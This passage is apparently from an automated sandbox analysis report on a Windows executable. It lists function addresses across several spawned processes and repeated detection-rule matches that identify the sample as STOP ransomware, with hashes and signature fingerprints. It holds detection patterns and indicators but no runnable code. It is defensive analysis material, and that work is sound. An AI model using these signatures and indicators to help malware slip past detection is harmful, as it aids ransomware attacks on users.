        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004069F32_2_004069F3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00402B802_2_00402B80
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00406B802_2_00406B80
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0044ACFF2_2_0044ACFF
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0042CE512_2_0042CE51
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00434E0B2_2_00434E0B
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00406EE02_2_00406EE0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00420F302_2_00420F30
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004050572_2_00405057
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0042F0102_2_0042F010
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004070E02_2_004070E0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004391F62_2_004391F6
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004352402_2_00435240
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004C93432_2_004C9343
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004054472_2_00405447
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004054572_2_00405457
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004495062_2_00449506
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0044B5B12_2_0044B5B1
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004356752_2_00435675
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004096862_2_00409686
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040F7302_2_0040F730
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0044D7A12_2_0044D7A1
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004819202_2_00481920
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0044D9DC2_2_0044D9DC
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00449A712_2_00449A71
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00443B402_2_00443B40
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00409CF92_2_00409CF9
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040DD402_2_0040DD40
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00427D6C2_2_00427D6C
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040BDC02_2_0040BDC0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00409DFA2_2_00409DFA
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00409F762_2_00409F76
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0046BFE02_2_0046BFE0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00449FE32_2_00449FE3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022072205_2_02207220
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022822C05_2_022822C0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0224E37C5_2_0224E37C
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022073935_2_02207393
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0220A0265_2_0220A026
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0221F0305_2_0221F030
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0220B0005_2_0220B000
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0220B0B05_2_0220B0B0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022070E05_2_022070E0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022030F05_2_022030F0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022100D05_2_022100D0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022091205_2_02209120
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0224E1415_2_0224E141
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0222D1A45_2_0222D1A4
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0220A6995_2_0220A699
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0224B69F5_2_0224B69F
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0220E6E05_2_0220E6E0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0220C7605_2_0220C760
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0220A79A5_2_0220A79A
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0222D7F15_2_0222D7F1
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022035205_2_02203520
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022075205_2_02207520
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0220CA105_2_0220CA10
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02207A805_2_02207A80
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02210B005_2_02210B00
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02202B605_2_02202B60
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0220DBE05_2_0220DBE0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022078805_2_02207880
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022218D05_2_022218D0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0221A9305_2_0221A930
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0220A9165_2_0220A916
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0222E9A35_2_0222E9A3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_0222F9B05_2_0222F9B0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022059F75_2_022059F7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_022089D05_2_022089D0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02208E605_2_02208E60
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02234E9F5_2_02234E9F
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02242D1E5_2_02242D1E
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02205DE75_2_02205DE7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02205DF75_2_02205DF7
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B72206_2_022B7220
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_023322C06_2_023322C0
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022FE37C6_2_022FE37C
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B73936_2_022B7393
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022BA0266_2_022BA026
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022CF0306_2_022CF030
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022BB0006_2_022BB000
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022BB0B06_2_022BB0B0
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B70E06_2_022B70E0
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B30F06_2_022B30F0
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022C00D06_2_022C00D0
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B91206_2_022B9120
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022FE1416_2_022FE141
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022DD1A46_2_022DD1A4
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022FB69F6_2_022FB69F
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022BA6996_2_022BA699
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022BE6E06_2_022BE6E0
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022BC7606_2_022BC760
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022BA79A6_2_022BA79A
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022DD7F16_2_022DD7F1
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B35206_2_022B3520
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B75206_2_022B7520
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022BCA106_2_022BCA10
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B7A806_2_022B7A80
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022C0B006_2_022C0B00
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B2B606_2_022B2B60
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022BDBE06_2_022BDBE0
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B78806_2_022B7880
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022D18D06_2_022D18D0
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022CA9306_2_022CA930
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022BA9166_2_022BA916
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022DE9A36_2_022DE9A3
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022DF9B06_2_022DF9B0
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B59F76_2_022B59F7
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B89D06_2_022B89D0
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B8E606_2_022B8E60
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022E4E9F6_2_022E4E9F
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022F2D1E6_2_022F2D1E
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B5DE76_2_022B5DE7
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B5DF76_2_022B5DF7
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: String function: 022D8EC0 appears 57 times
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: String function: 022E0160 appears 50 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 00428C81 appears 42 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 00404C80 appears 157 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 004547A0 appears 75 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 004049B0 appears 116 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 02238EC0 appears 57 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 0042F7C0 appears 99 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 02240160 appears 50 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 02228EC0 appears 57 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 0044F23E appears 53 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 00428520 appears 77 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 00454E50 appears 42 times
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: String function: 02230160 appears 50 times
        Source: tsnsd8pOvn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 2.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 2.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 13.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 13.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 13.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 13.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 12.2.tsnsd8pOvn.exe.21c15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 8.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 8.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 11.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 11.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 6.2.tsnsd8pOvn.exe.22b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 10.2.tsnsd8pOvn.exe.22515a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0.2.tsnsd8pOvn.exe.22115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 2.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 2.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 5.2.tsnsd8pOvn.exe.22015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 8.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 8.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 7.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 7.2.tsnsd8pOvn.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 7.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 7.2.tsnsd8pOvn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
